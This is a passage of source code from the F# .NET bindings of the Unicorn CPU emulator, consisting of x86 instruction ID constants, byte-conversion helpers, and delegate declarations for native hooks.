712 let UC_X86_INS_FUCOM = 713 let UC_X86_INS_UD2B = 714 let UC_X86_INS_UNPCKHPD = 715 let UC_X86_INS_UNPCKHPS = 716 let UC_X86_INS_UNPCKLPD = 717 let UC_X86_INS_UNPCKLPS = 718 let UC_X86_INS_VADDPD = 719 let UC_X86_INS_VADDPS = 720 let UC_X86_INS_VADDSD = 721 let UC_X86_INS_VADDSS = 722 let UC_X86_INS_VADDSUBPD = 723 let UC_X86_INS_VADDSUBPS = 724 let UC_X86_INS_VAESDECLAST = 725 let UC_X86_INS_VAESDEC = 726 let UC_X86_INS_VAESENCLAST = 727 let UC_X86_INS_VAESENC = 728 let UC_X86_INS_VAESIMC = 729 let UC_X86_INS_VAESKEYGENASSIST = 730 let UC_X86_INS_VALIGND = 731 let UC_X86_INS_VALIGNQ = 732 let UC_X86_INS_VANDNPD = 733 let UC_X86_INS_VANDNPS = 734 let UC_X86_INS_VANDPD = 735 let UC_X86_INS_VANDPS = 736 let UC_X86_INS_VBLENDMPD = 737 let UC_X86_INS_VBLENDMPS = 738 let UC_X86_INS_VBLENDPD = 739 let UC_X86_INS_VBLENDPS = 740 let UC_X86_INS_VBLENDVPD = 741 let 
UC_X86_INS_VBLENDVPS = 742 let UC_X86_INS_VBROADCASTF128 = 743 let UC_X86_INS_VBROADCASTI32X4 = 744 let UC_X86_INS_VBROADCASTI64X4 = 745 let UC_X86_INS_VBROADCASTSD = 746 let UC_X86_INS_VBROADCASTSS = 747 let UC_X86_INS_VCMPPD = 748 let UC_X86_INS_VCMPPS = 749 let UC_X86_INS_VCMPSD = 750 let UC_X86_INS_VCMPSS = 751 let UC_X86_INS_VCOMPRESSPD = 752 let UC_X86_INS_VCOMPRESSPS = 753 let UC_X86_INS_VCVTDQ2PD = 754 let UC_X86_INS_VCVTDQ2PS = 755 let UC_X86_INS_VCVTPD2DQX = 756 let UC_X86_INS_VCVTPD2DQ = 757 let UC_X86_INS_VCVTPD2PSX = 758 let UC_X86_INS_VCVTPD2PS = 759 let UC_X86_INS_VCVTPD2UDQ = 760 let UC_X86_INS_VCVTPH2PS = 761 let UC_X86_INS_VCVTPS2DQ = 762 let UC_X86_INS_VCVTPS2PD = 763 let UC_X86_INS_VCVTPS2PH = 764 let UC_X86_INS_VCVTPS2UDQ = 765 let UC_X86_INS_VCVTSD2SI = 766 let UC_X86_INS_VCVTSD2USI = 767 let UC_X86_INS_VCVTSS2SI = 768 let UC_X86_INS_VCVTSS2USI = 769 let UC_X86_INS_VCVTTPD2DQX = 770 let UC_X86_INS_VCVTTPD2DQ = 771 let UC_X86_INS_VCVTTPD2UDQ = 772 let UC_X86_INS_VCVTTPS2DQ = 773 let UC_X86_INS_VCVTTPS2UDQ = 774 let UC_X86_INS_VCVTUDQ2PD = 775 let UC_X86_INS_VCVTUDQ2PS = 776 let UC_X86_INS_VDIVPD = 777 let UC_X86_INS_VDIVPS = 778 let UC_X86_INS_VDIVSD = 779 let UC_X86_INS_VDIVSS = 780 let UC_X86_INS_VDPPD = 781 let UC_X86_INS_VDPPS = 782 let UC_X86_INS_VERR = 783 let UC_X86_INS_VERW = 784 let UC_X86_INS_VEXP2PD = 785 let UC_X86_INS_VEXP2PS = 786 let UC_X86_INS_VEXPANDPD = 787 let UC_X86_INS_VEXPANDPS = 788 let UC_X86_INS_VEXTRACTF128 = 789 let UC_X86_INS_VEXTRACTF32X4 = 790 let UC_X86_INS_VEXTRACTF64X4 = 791 let UC_X86_INS_VEXTRACTI128 = 792 let UC_X86_INS_VEXTRACTI32X4 = 793 let UC_X86_INS_VEXTRACTI64X4 = 794 let UC_X86_INS_VEXTRACTPS = 795 let UC_X86_INS_VFMADD132PD = 796 let UC_X86_INS_VFMADD132PS = 797 let UC_X86_INS_VFMADDPD = 798 let UC_X86_INS_VFMADD213PD = 799 let UC_X86_INS_VFMADD231PD = 800 let UC_X86_INS_VFMADDPS = 801 let UC_X86_INS_VFMADD213PS = 802 let UC_X86_INS_VFMADD231PS = 803 let UC_X86_INS_VFMADDSD = 804 let UC_X86_INS_VFMADD213SD = 805 let UC_X86_INS_VFMADD132SD = 806 let UC_X86_INS_VFMADD231SD = 807 let UC_X86_INS_VFMADDSS = 808 let UC_X86_INS_VFMADD213SS = 809 let UC_X86_INS_VFMADD132SS = 810 let UC_X86_INS_VFMADD231SS = 811 let UC_X86_INS_VFMADDSUB132PD = 812 let UC_X86_INS_VFMADDSUB132PS = 813 let UC_X86_INS_VFMADDSUBPD = 814 let UC_X86_INS_VFMADDSUB213PD = 815 let UC_X86_INS_VFMADDSUB231PD = 816 let UC_X86_INS_VFMADDSUBPS = 817 let UC_X86_INS_VFMADDSUB213PS = 818 let UC_X86_INS_VFMADDSUB231PS = 819 let UC_X86_INS_VFMSUB132PD = 820 let UC_X86_INS_VFMSUB132PS = 821 let UC_X86_INS_VFMSUBADD132PD = 822 let UC_X86_INS_VFMSUBADD132PS = 823 let UC_X86_INS_VFMSUBADDPD = 824 let UC_X86_INS_VFMSUBADD213PD = 825 let UC_X86_INS_VFMSUBADD231PD = 826 let UC_X86_INS_VFMSUBADDPS = 827 let UC_X86_INS_VFMSUBADD213PS = 828 let UC_X86_INS_VFMSUBADD231PS = 829 let UC_X86_INS_VFMSUBPD = 830 let UC_X86_INS_VFMSUB213PD = 831 let UC_X86_INS_VFMSUB231PD = 832 let UC_X86_INS_VFMSUBPS = 833 let UC_X86_INS_VFMSUB213PS = 834 let UC_X86_INS_VFMSUB231PS = 835 let UC_X86_INS_VFMSUBSD = 836 let UC_X86_INS_VFMSUB213SD = 837 let UC_X86_INS_VFMSUB132SD = 838 let UC_X86_INS_VFMSUB231SD = 839 let UC_X86_INS_VFMSUBSS = 840 let UC_X86_INS_VFMSUB213SS = 841 let UC_X86_INS_VFMSUB132SS = 842 let UC_X86_INS_VFMSUB231SS = 843 let UC_X86_INS_VFNMADD132PD = 844 let UC_X86_INS_VFNMADD132PS = 845 let UC_X86_INS_VFNMADDPD = 846 let UC_X86_INS_VFNMADD213PD = 847 let UC_X86_INS_VFNMADD231PD = 848 let UC_X86_INS_VFNMADDPS = 849 let UC_X86_INS_VFNMADD213PS = 850 let UC_X86_INS_VFNMADD231PS = 851 
let UC_X86_INS_VFNMADDSD = 852 let UC_X86_INS_VFNMADD213SD = 853 let UC_X86_INS_VFNMADD132SD = 854 let UC_X86_INS_VFNMADD231SD = 855 let UC_X86_INS_VFNMADDSS = 856 let UC_X86_INS_VFNMADD213SS = 857 let UC_X86_INS_VFNMADD132SS = 858 let UC_X86_INS_VFNMADD231SS = 859 let UC_X86_INS_VFNMSUB132PD = 860 let UC_X86_INS_VFNMSUB132PS = 861 let UC_X86_INS_VFNMSUBPD = 862 let UC_X86_INS_VFNMSUB213PD = 863 let UC_X86_INS_VFNMSUB231PD = 864 let UC_X86_INS_VFNMSUBPS = 865 let UC_X86_INS_VFNMSUB213PS = 866 let UC_X86_INS_VFNMSUB231PS = 867 let UC_X86_INS_VFNMSUBSD = 868 let UC_X86_INS_VFNMSUB213SD = 869 let UC_X86_INS_VFNMSUB132SD = 870 let UC_X86_INS_VFNMSUB231SD = 871 let UC_X86_INS_VFNMSUBSS = 872 let UC_X86_INS_VFNMSUB213SS = 873 let UC_X86_INS_VFNMSUB132SS = 874 let UC_X86_INS_VFNMSUB231SS = 875 let UC_X86_INS_VFRCZPD = 876 let UC_X86_INS_VFRCZPS = 877 let UC_X86_INS_VFRCZSD = 878 let UC_X86_INS_VFRCZSS = 879 let UC_X86_INS_VORPD = 880 let UC_X86_INS_VORPS = 881 let UC_X86_INS_VXORPD = 882 let UC_X86_INS_VXORPS = 883 let UC_X86_INS_VGATHERDPD = 884 let UC_X86_INS_VGATHERDPS = 885 let UC_X86_INS_VGATHERPF0DPD = 886 let UC_X86_INS_VGATHERPF0DPS = 887 let UC_X86_INS_VGATHERPF0QPD = 888 let UC_X86_INS_VGATHERPF0QPS = 889 let UC_X86_INS_VGATHERPF1DPD = 890 let UC_X86_INS_VGATHERPF1DPS = 891 let UC_X86_INS_VGATHERPF1QPD = 892 let UC_X86_INS_VGATHERPF1QPS = 893 let UC_X86_INS_VGATHERQPD = 894 let UC_X86_INS_VGATHERQPS = 895 let UC_X86_INS_VHADDPD = 896 let UC_X86_INS_VHADDPS = 897 let UC_X86_INS_VHSUBPD = 898 let UC_X86_INS_VHSUBPS = 899 let UC_X86_INS_VINSERTF128 = 900 let UC_X86_INS_VINSERTF32X4 = 901 let UC_X86_INS_VINSERTF32X8 = 902 let UC_X86_INS_VINSERTF64X2 = 903 let UC_X86_INS_VINSERTF64X4 = 904 let UC_X86_INS_VINSERTI128 = 905 let UC_X86_INS_VINSERTI32X4 = 906 let UC_X86_INS_VINSERTI32X8 = 907 let UC_X86_INS_VINSERTI64X2 = 908 let UC_X86_INS_VINSERTI64X4 = 909 let UC_X86_INS_VINSERTPS = 910 let UC_X86_INS_VLDDQU = 911 let UC_X86_INS_VLDMXCSR = 912 let UC_X86_INS_VMASKMOVDQU = 913 let UC_X86_INS_VMASKMOVPD = 914 let UC_X86_INS_VMASKMOVPS = 915 let UC_X86_INS_VMAXPD = 916 let UC_X86_INS_VMAXPS = 917 let UC_X86_INS_VMAXSD = 918 let UC_X86_INS_VMAXSS = 919 let UC_X86_INS_VMCALL = 920 let UC_X86_INS_VMCLEAR = 921 let UC_X86_INS_VMFUNC = 922 let UC_X86_INS_VMINPD = 923 let UC_X86_INS_VMINPS = 924 let UC_X86_INS_VMINSD = 925 let UC_X86_INS_VMINSS = 926 let UC_X86_INS_VMLAUNCH = 927 let UC_X86_INS_VMLOAD = 928 let UC_X86_INS_VMMCALL = 929 let UC_X86_INS_VMOVQ = 930 let UC_X86_INS_VMOVDDUP = 931 let UC_X86_INS_VMOVD = 932 let UC_X86_INS_VMOVDQA32 = 933 let UC_X86_INS_VMOVDQA64 = 934 let UC_X86_INS_VMOVDQA = 935 let UC_X86_INS_VMOVDQU16 = 936 let UC_X86_INS_VMOVDQU32 = 937 let UC_X86_INS_VMOVDQU64 = 938 let UC_X86_INS_VMOVDQU8 = 939 let UC_X86_INS_VMOVDQU = 940 let UC_X86_INS_VMOVHLPS = 941 let UC_X86_INS_VMOVHPD = 942 let UC_X86_INS_VMOVHPS = 943 let UC_X86_INS_VMOVLHPS = 944 let UC_X86_INS_VMOVLPD = 945 let UC_X86_INS_VMOVLPS = 946 let UC_X86_INS_VMOVMSKPD = 947 let UC_X86_INS_VMOVMSKPS = 948 let UC_X86_INS_VMOVNTDQA = 949 let UC_X86_INS_VMOVNTDQ = 950 let UC_X86_INS_VMOVNTPD = 951 let UC_X86_INS_VMOVNTPS = 952 let UC_X86_INS_VMOVSD = 953 let UC_X86_INS_VMOVSHDUP = 954 let UC_X86_INS_VMOVSLDUP = 955 let UC_X86_INS_VMOVSS = 956 let UC_X86_INS_VMOVUPD = 957 let UC_X86_INS_VMOVUPS = 958 let UC_X86_INS_VMPSADBW = 959 let UC_X86_INS_VMPTRLD = 960 let UC_X86_INS_VMPTRST = 961 let UC_X86_INS_VMREAD = 962 let UC_X86_INS_VMRESUME = 963 let UC_X86_INS_VMRUN = 964 let UC_X86_INS_VMSAVE = 965 let UC_X86_INS_VMULPD = 
966 let UC_X86_INS_VMULPS = 967 let UC_X86_INS_VMULSD = 968 let UC_X86_INS_VMULSS = 969 let UC_X86_INS_VMWRITE = 970 let UC_X86_INS_VMXOFF = 971 let UC_X86_INS_VMXON = 972 let UC_X86_INS_VPABSB = 973 let UC_X86_INS_VPABSD = 974 let UC_X86_INS_VPABSQ = 975 let UC_X86_INS_VPABSW = 976 let UC_X86_INS_VPACKSSDW = 977 let UC_X86_INS_VPACKSSWB = 978 let UC_X86_INS_VPACKUSDW = 979 let UC_X86_INS_VPACKUSWB = 980 let UC_X86_INS_VPADDB = 981 let UC_X86_INS_VPADDD = 982 let UC_X86_INS_VPADDQ = 983 let UC_X86_INS_VPADDSB = 984 let UC_X86_INS_VPADDSW = 985 let UC_X86_INS_VPADDUSB = 986 let UC_X86_INS_VPADDUSW = 987 let UC_X86_INS_VPADDW = 988 let UC_X86_INS_VPALIGNR = 989 let UC_X86_INS_VPANDD = 990 let UC_X86_INS_VPANDND = 991 let UC_X86_INS_VPANDNQ = 992 let UC_X86_INS_VPANDN = 993 let UC_X86_INS_VPANDQ = 994 let UC_X86_INS_VPAND = 995 let UC_X86_INS_VPAVGB = 996 let UC_X86_INS_VPAVGW = 997 let UC_X86_INS_VPBLENDD = 998 let UC_X86_INS_VPBLENDMB = 999 let UC_X86_INS_VPBLENDMD = 1000 let UC_X86_INS_VPBLENDMQ = 1001 let UC_X86_INS_VPBLENDMW = 1002 let UC_X86_INS_VPBLENDVB = 1003 let UC_X86_INS_VPBLENDW = 1004 let UC_X86_INS_VPBROADCASTB = 1005 let UC_X86_INS_VPBROADCASTD = 1006 let UC_X86_INS_VPBROADCASTMB2Q = 1007 let UC_X86_INS_VPBROADCASTMW2D = 1008 let UC_X86_INS_VPBROADCASTQ = 1009 let UC_X86_INS_VPBROADCASTW = 1010 let UC_X86_INS_VPCLMULQDQ = 1011 let UC_X86_INS_VPCMOV = 1012 let UC_X86_INS_VPCMPB = 1013 let UC_X86_INS_VPCMPD = 1014 let UC_X86_INS_VPCMPEQB = 1015 let UC_X86_INS_VPCMPEQD = 1016 let UC_X86_INS_VPCMPEQQ = 1017 let UC_X86_INS_VPCMPEQW = 1018 let UC_X86_INS_VPCMPESTRI = 1019 let UC_X86_INS_VPCMPESTRM = 1020 let UC_X86_INS_VPCMPGTB = 1021 let UC_X86_INS_VPCMPGTD = 1022 let UC_X86_INS_VPCMPGTQ = 1023 let UC_X86_INS_VPCMPGTW = 1024 let UC_X86_INS_VPCMPISTRI = 1025 let UC_X86_INS_VPCMPISTRM = 1026 let UC_X86_INS_VPCMPQ = 1027 let UC_X86_INS_VPCMPUB = 1028 let UC_X86_INS_VPCMPUD = 1029 let UC_X86_INS_VPCMPUQ = 1030 let UC_X86_INS_VPCMPUW = 1031 let UC_X86_INS_VPCMPW = 1032 let UC_X86_INS_VPCOMB = 1033 let UC_X86_INS_VPCOMD = 1034 let UC_X86_INS_VPCOMPRESSD = 1035 let UC_X86_INS_VPCOMPRESSQ = 1036 let UC_X86_INS_VPCOMQ = 1037 let UC_X86_INS_VPCOMUB = 1038 let UC_X86_INS_VPCOMUD = 1039 let UC_X86_INS_VPCOMUQ = 1040 let UC_X86_INS_VPCOMUW = 1041 let UC_X86_INS_VPCOMW = 1042 let UC_X86_INS_VPCONFLICTD = 1043 let UC_X86_INS_VPCONFLICTQ = 1044 let UC_X86_INS_VPERM2F128 = 1045 let UC_X86_INS_VPERM2I128 = 1046 let UC_X86_INS_VPERMD = 1047 let UC_X86_INS_VPERMI2D = 1048 let UC_X86_INS_VPERMI2PD = 1049 let UC_X86_INS_VPERMI2PS = 1050 let UC_X86_INS_VPERMI2Q = 1051 let UC_X86_INS_VPERMIL2PD = 1052 let UC_X86_INS_VPERMIL2PS = 1053 let UC_X86_INS_VPERMILPD = 1054 let UC_X86_INS_VPERMILPS = 1055 let UC_X86_INS_VPERMPD = 1056 let UC_X86_INS_VPERMPS = 1057 let UC_X86_INS_VPERMQ = 1058 let UC_X86_INS_VPERMT2D = 1059 let UC_X86_INS_VPERMT2PD = 1060 let UC_X86_INS_VPERMT2PS = 1061 let UC_X86_INS_VPERMT2Q = 1062 let UC_X86_INS_VPEXPANDD = 1063 let UC_X86_INS_VPEXPANDQ = 1064 let UC_X86_INS_VPEXTRB = 1065 let UC_X86_INS_VPEXTRD = 1066 let UC_X86_INS_VPEXTRQ = 1067 let UC_X86_INS_VPEXTRW = 1068 let UC_X86_INS_VPGATHERDD = 1069 let UC_X86_INS_VPGATHERDQ = 1070 let UC_X86_INS_VPGATHERQD = 1071 let UC_X86_INS_VPGATHERQQ = 1072 let UC_X86_INS_VPHADDBD = 1073 let UC_X86_INS_VPHADDBQ = 1074 let UC_X86_INS_VPHADDBW = 1075 let UC_X86_INS_VPHADDDQ = 1076 let UC_X86_INS_VPHADDD = 1077 let UC_X86_INS_VPHADDSW = 1078 let UC_X86_INS_VPHADDUBD = 1079 let UC_X86_INS_VPHADDUBQ = 1080 let UC_X86_INS_VPHADDUBW = 1081 let 
UC_X86_INS_VPHADDUDQ = 1082 let UC_X86_INS_VPHADDUWD = 1083 let UC_X86_INS_VPHADDUWQ = 1084 let UC_X86_INS_VPHADDWD = 1085 let UC_X86_INS_VPHADDWQ = 1086 let UC_X86_INS_VPHADDW = 1087 let UC_X86_INS_VPHMINPOSUW = 1088 let UC_X86_INS_VPHSUBBW = 1089 let UC_X86_INS_VPHSUBDQ = 1090 let UC_X86_INS_VPHSUBD = 1091 let UC_X86_INS_VPHSUBSW = 1092 let UC_X86_INS_VPHSUBWD = 1093 let UC_X86_INS_VPHSUBW = 1094 let UC_X86_INS_VPINSRB = 1095 let UC_X86_INS_VPINSRD = 1096 let UC_X86_INS_VPINSRQ = 1097 let UC_X86_INS_VPINSRW = 1098 let UC_X86_INS_VPLZCNTD = 1099 let UC_X86_INS_VPLZCNTQ = 1100 let UC_X86_INS_VPMACSDD = 1101 let UC_X86_INS_VPMACSDQH = 1102 let UC_X86_INS_VPMACSDQL = 1103 let UC_X86_INS_VPMACSSDD = 1104 let UC_X86_INS_VPMACSSDQH = 1105 let UC_X86_INS_VPMACSSDQL = 1106 let UC_X86_INS_VPMACSSWD = 1107 let UC_X86_INS_VPMACSSWW = 1108 let UC_X86_INS_VPMACSWD = 1109 let UC_X86_INS_VPMACSWW = 1110 let UC_X86_INS_VPMADCSSWD = 1111 let UC_X86_INS_VPMADCSWD = 1112 let UC_X86_INS_VPMADDUBSW = 1113 let UC_X86_INS_VPMADDWD = 1114 let UC_X86_INS_VPMASKMOVD = 1115 let UC_X86_INS_VPMASKMOVQ = 1116 let UC_X86_INS_VPMAXSB = 1117 let UC_X86_INS_VPMAXSD = 1118 let UC_X86_INS_VPMAXSQ = 1119 let UC_X86_INS_VPMAXSW = 1120 let UC_X86_INS_VPMAXUB = 1121 let UC_X86_INS_VPMAXUD = 1122 let UC_X86_INS_VPMAXUQ = 1123 let UC_X86_INS_VPMAXUW = 1124 let UC_X86_INS_VPMINSB = 1125 let UC_X86_INS_VPMINSD = 1126 let UC_X86_INS_VPMINSQ = 1127 let UC_X86_INS_VPMINSW = 1128 let UC_X86_INS_VPMINUB = 1129 let UC_X86_INS_VPMINUD = 1130 let UC_X86_INS_VPMINUQ = 1131 let UC_X86_INS_VPMINUW = 1132 let UC_X86_INS_VPMOVDB = 1133 let UC_X86_INS_VPMOVDW = 1134 let UC_X86_INS_VPMOVM2B = 1135 let UC_X86_INS_VPMOVM2D = 1136 let UC_X86_INS_VPMOVM2Q = 1137 let UC_X86_INS_VPMOVM2W = 1138 let UC_X86_INS_VPMOVMSKB = 1139 let UC_X86_INS_VPMOVQB = 1140 let UC_X86_INS_VPMOVQD = 1141 let UC_X86_INS_VPMOVQW = 1142 let UC_X86_INS_VPMOVSDB = 1143 let UC_X86_INS_VPMOVSDW = 1144 let UC_X86_INS_VPMOVSQB = 1145 let UC_X86_INS_VPMOVSQD = 1146 let UC_X86_INS_VPMOVSQW = 1147 let UC_X86_INS_VPMOVSXBD = 1148 let UC_X86_INS_VPMOVSXBQ = 1149 let UC_X86_INS_VPMOVSXBW = 1150 let UC_X86_INS_VPMOVSXDQ = 1151 let UC_X86_INS_VPMOVSXWD = 1152 let UC_X86_INS_VPMOVSXWQ = 1153 let UC_X86_INS_VPMOVUSDB = 1154 let UC_X86_INS_VPMOVUSDW = 1155 let UC_X86_INS_VPMOVUSQB = 1156 let UC_X86_INS_VPMOVUSQD = 1157 let UC_X86_INS_VPMOVUSQW = 1158 let UC_X86_INS_VPMOVZXBD = 1159 let UC_X86_INS_VPMOVZXBQ = 1160 let UC_X86_INS_VPMOVZXBW = 1161 let UC_X86_INS_VPMOVZXDQ = 1162 let UC_X86_INS_VPMOVZXWD = 1163 let UC_X86_INS_VPMOVZXWQ = 1164 let UC_X86_INS_VPMULDQ = 1165 let UC_X86_INS_VPMULHRSW = 1166 let UC_X86_INS_VPMULHUW = 1167 let UC_X86_INS_VPMULHW = 1168 let UC_X86_INS_VPMULLD = 1169 let UC_X86_INS_VPMULLQ = 1170 let UC_X86_INS_VPMULLW = 1171 let UC_X86_INS_VPMULUDQ = 1172 let UC_X86_INS_VPORD = 1173 let UC_X86_INS_VPORQ = 1174 let UC_X86_INS_VPOR = 1175 let UC_X86_INS_VPPERM = 1176 let UC_X86_INS_VPROTB = 1177 let UC_X86_INS_VPROTD = 1178 let UC_X86_INS_VPROTQ = 1179 let UC_X86_INS_VPROTW = 1180 let UC_X86_INS_VPSADBW = 1181 let UC_X86_INS_VPSCATTERDD = 1182 let UC_X86_INS_VPSCATTERDQ = 1183 let UC_X86_INS_VPSCATTERQD = 1184 let UC_X86_INS_VPSCATTERQQ = 1185 let UC_X86_INS_VPSHAB = 1186 let UC_X86_INS_VPSHAD = 1187 let UC_X86_INS_VPSHAQ = 1188 let UC_X86_INS_VPSHAW = 1189 let UC_X86_INS_VPSHLB = 1190 let UC_X86_INS_VPSHLD = 1191 let UC_X86_INS_VPSHLQ = 1192 let UC_X86_INS_VPSHLW = 1193 let UC_X86_INS_VPSHUFB = 1194 let UC_X86_INS_VPSHUFD = 1195 let UC_X86_INS_VPSHUFHW = 1196 let 
UC_X86_INS_VPSHUFLW = 1197 let UC_X86_INS_VPSIGNB = 1198 let UC_X86_INS_VPSIGND = 1199 let UC_X86_INS_VPSIGNW = 1200 let UC_X86_INS_VPSLLDQ = 1201 let UC_X86_INS_VPSLLD = 1202 let UC_X86_INS_VPSLLQ = 1203 let UC_X86_INS_VPSLLVD = 1204 let UC_X86_INS_VPSLLVQ = 1205 let UC_X86_INS_VPSLLW = 1206 let UC_X86_INS_VPSRAD = 1207 let UC_X86_INS_VPSRAQ = 1208 let UC_X86_INS_VPSRAVD = 1209 let UC_X86_INS_VPSRAVQ = 1210 let UC_X86_INS_VPSRAW = 1211 let UC_X86_INS_VPSRLDQ = 1212 let UC_X86_INS_VPSRLD = 1213 let UC_X86_INS_VPSRLQ = 1214 let UC_X86_INS_VPSRLVD = 1215 let UC_X86_INS_VPSRLVQ = 1216 let UC_X86_INS_VPSRLW = 1217 let UC_X86_INS_VPSUBB = 1218 let UC_X86_INS_VPSUBD = 1219 let UC_X86_INS_VPSUBQ = 1220 let UC_X86_INS_VPSUBSB = 1221 let UC_X86_INS_VPSUBSW = 1222 let UC_X86_INS_VPSUBUSB = 1223 let UC_X86_INS_VPSUBUSW = 1224 let UC_X86_INS_VPSUBW = 1225 let UC_X86_INS_VPTESTMD = 1226 let UC_X86_INS_VPTESTMQ = 1227 let UC_X86_INS_VPTESTNMD = 1228 let UC_X86_INS_VPTESTNMQ = 1229 let UC_X86_INS_VPTEST = 1230 let UC_X86_INS_VPUNPCKHBW = 1231 let UC_X86_INS_VPUNPCKHDQ = 1232 let UC_X86_INS_VPUNPCKHQDQ = 1233 let UC_X86_INS_VPUNPCKHWD = 1234 let UC_X86_INS_VPUNPCKLBW = 1235 let UC_X86_INS_VPUNPCKLDQ = 1236 let UC_X86_INS_VPUNPCKLQDQ = 1237 let UC_X86_INS_VPUNPCKLWD = 1238 let UC_X86_INS_VPXORD = 1239 let UC_X86_INS_VPXORQ = 1240 let UC_X86_INS_VPXOR = 1241 let UC_X86_INS_VRCP14PD = 1242 let UC_X86_INS_VRCP14PS = 1243 let UC_X86_INS_VRCP14SD = 1244 let UC_X86_INS_VRCP14SS = 1245 let UC_X86_INS_VRCP28PD = 1246 let UC_X86_INS_VRCP28PS = 1247 let UC_X86_INS_VRCP28SD = 1248 let UC_X86_INS_VRCP28SS = 1249 let UC_X86_INS_VRCPPS = 1250 let UC_X86_INS_VRCPSS = 1251 let UC_X86_INS_VRNDSCALEPD = 1252 let UC_X86_INS_VRNDSCALEPS = 1253 let UC_X86_INS_VRNDSCALESD = 1254 let UC_X86_INS_VRNDSCALESS = 1255 let UC_X86_INS_VROUNDPD = 1256 let UC_X86_INS_VROUNDPS = 1257 let UC_X86_INS_VROUNDSD = 1258 let UC_X86_INS_VROUNDSS = 1259 let UC_X86_INS_VRSQRT14PD = 1260 let UC_X86_INS_VRSQRT14PS = 1261 let UC_X86_INS_VRSQRT14SD = 1262 let UC_X86_INS_VRSQRT14SS = 1263 let UC_X86_INS_VRSQRT28PD = 1264 let UC_X86_INS_VRSQRT28PS = 1265 let UC_X86_INS_VRSQRT28SD = 1266 let UC_X86_INS_VRSQRT28SS = 1267 let UC_X86_INS_VRSQRTPS = 1268 let UC_X86_INS_VRSQRTSS = 1269 let UC_X86_INS_VSCATTERDPD = 1270 let UC_X86_INS_VSCATTERDPS = 1271 let UC_X86_INS_VSCATTERPF0DPD = 1272 let UC_X86_INS_VSCATTERPF0DPS = 1273 let UC_X86_INS_VSCATTERPF0QPD = 1274 let UC_X86_INS_VSCATTERPF0QPS = 1275 let UC_X86_INS_VSCATTERPF1DPD = 1276 let UC_X86_INS_VSCATTERPF1DPS = 1277 let UC_X86_INS_VSCATTERPF1QPD = 1278 let UC_X86_INS_VSCATTERPF1QPS = 1279 let UC_X86_INS_VSCATTERQPD = 1280 let UC_X86_INS_VSCATTERQPS = 1281 let UC_X86_INS_VSHUFPD = 1282 let UC_X86_INS_VSHUFPS = 1283 let UC_X86_INS_VSQRTPD = 1284 let UC_X86_INS_VSQRTPS = 1285 let UC_X86_INS_VSQRTSD = 1286 let UC_X86_INS_VSQRTSS = 1287 let UC_X86_INS_VSTMXCSR = 1288 let UC_X86_INS_VSUBPD = 1289 let UC_X86_INS_VSUBPS = 1290 let UC_X86_INS_VSUBSD = 1291 let UC_X86_INS_VSUBSS = 1292 let UC_X86_INS_VTESTPD = 1293 let UC_X86_INS_VTESTPS = 1294 let UC_X86_INS_VUNPCKHPD = 1295 let UC_X86_INS_VUNPCKHPS = 1296 let UC_X86_INS_VUNPCKLPD = 1297 let UC_X86_INS_VUNPCKLPS = 1298 let UC_X86_INS_VZEROALL = 1299 let UC_X86_INS_VZEROUPPER = 1300 let UC_X86_INS_WAIT = 1301 let UC_X86_INS_WBINVD = 1302 let UC_X86_INS_WRFSBASE = 1303 let UC_X86_INS_WRGSBASE = 1304 let UC_X86_INS_WRMSR = 1305 let UC_X86_INS_XABORT = 1306 let UC_X86_INS_XACQUIRE = 1307 let UC_X86_INS_XBEGIN = 1308 let UC_X86_INS_XCHG = 1309 let UC_X86_INS_XCRYPTCBC = 
1310
    let UC_X86_INS_XCRYPTCFB = 1311
    let UC_X86_INS_XCRYPTCTR = 1312
    let UC_X86_INS_XCRYPTECB = 1313
    let UC_X86_INS_XCRYPTOFB = 1314
    let UC_X86_INS_XEND = 1315
    let UC_X86_INS_XGETBV = 1316
    let UC_X86_INS_XLATB = 1317
    let UC_X86_INS_XRELEASE = 1318
    let UC_X86_INS_XRSTOR = 1319
    let UC_X86_INS_XRSTOR64 = 1320
    let UC_X86_INS_XRSTORS = 1321
    let UC_X86_INS_XRSTORS64 = 1322
    let UC_X86_INS_XSAVE = 1323
    let UC_X86_INS_XSAVE64 = 1324
    let UC_X86_INS_XSAVEC = 1325
    let UC_X86_INS_XSAVEC64 = 1326
    let UC_X86_INS_XSAVEOPT = 1327
    let UC_X86_INS_XSAVEOPT64 = 1328
    let UC_X86_INS_XSAVES = 1329
    let UC_X86_INS_XSAVES64 = 1330
    let UC_X86_INS_XSETBV = 1331
    let UC_X86_INS_XSHA1 = 1332
    let UC_X86_INS_XSHA256 = 1333
    let UC_X86_INS_XSTORE = 1334
    let UC_X86_INS_XTEST = 1335
    let UC_X86_INS_FDISI8087_NOP = 1336
    let UC_X86_INS_FENI8087_NOP = 1337
    let UC_X86_INS_ENDING = 1338

unicorn-2.1.1/bindings/dotnet/UnicornEngine/ConvertUtility.fs

namespace UnicornEngine

open System

[<AutoOpen>]
module internal ConvertUtility =

    // Serialize an Int64 into 8 bytes, least significant byte first.
    let int64ToBytes(v: Int64) =
        let res = Array.zeroCreate 8
        let mutable uv = uint64 v
        for i = 0 to res.Length-1 do
            res.[i] <- byte (uv &&& uint64 0xFF)
            uv <- uv >>> 8
        res

    // Rebuild an Int64 from little-endian bytes (inverse of int64ToBytes).
    let bytesToInt64(v: Byte array) =
        let mutable res = uint64 0
        for i = 0 to v.Length-1 do
            let tmpV = v.[i] &&& byte 0xFF
            res <- res + (uint64 tmpV <<< (i * 8))
        int64 res

unicorn-2.1.1/bindings/dotnet/UnicornEngine/InternalHooks.fs

namespace UnicornEngine

open System
open System.Runtime.InteropServices

// internal hooks to be passed to native Unicorn library

[<UnmanagedFunctionPointer(CallingConvention.Cdecl)>]
type internal CodeHookInternal = delegate of IntPtr * Int64 * Int32 * IntPtr -> unit

[<UnmanagedFunctionPointer(CallingConvention.Cdecl)>]
type internal BlockHookInternal = delegate of IntPtr * Int64 * Int32 * IntPtr -> unit

[<UnmanagedFunctionPointer(CallingConvention.Cdecl)>]
type internal InterruptHookInternal = delegate of IntPtr * Int32 * IntPtr -> unit

[<UnmanagedFunctionPointer(CallingConvention.Cdecl)>]
type internal MemReadHookInternal = delegate of IntPtr * Int32 * Int64 * Int32 * IntPtr -> unit

[<UnmanagedFunctionPointer(CallingConvention.Cdecl)>]
type internal MemWriteHookInternal = delegate of IntPtr * Int32 * Int64 * Int32 * Int64 * IntPtr -> unit

[<UnmanagedFunctionPointer(CallingConvention.Cdecl)>]
type internal EventMemHookInternal = delegate of IntPtr * Int32 * Int64 * Int32 * Int64 * IntPtr -> Boolean

[<UnmanagedFunctionPointer(CallingConvention.Cdecl)>]
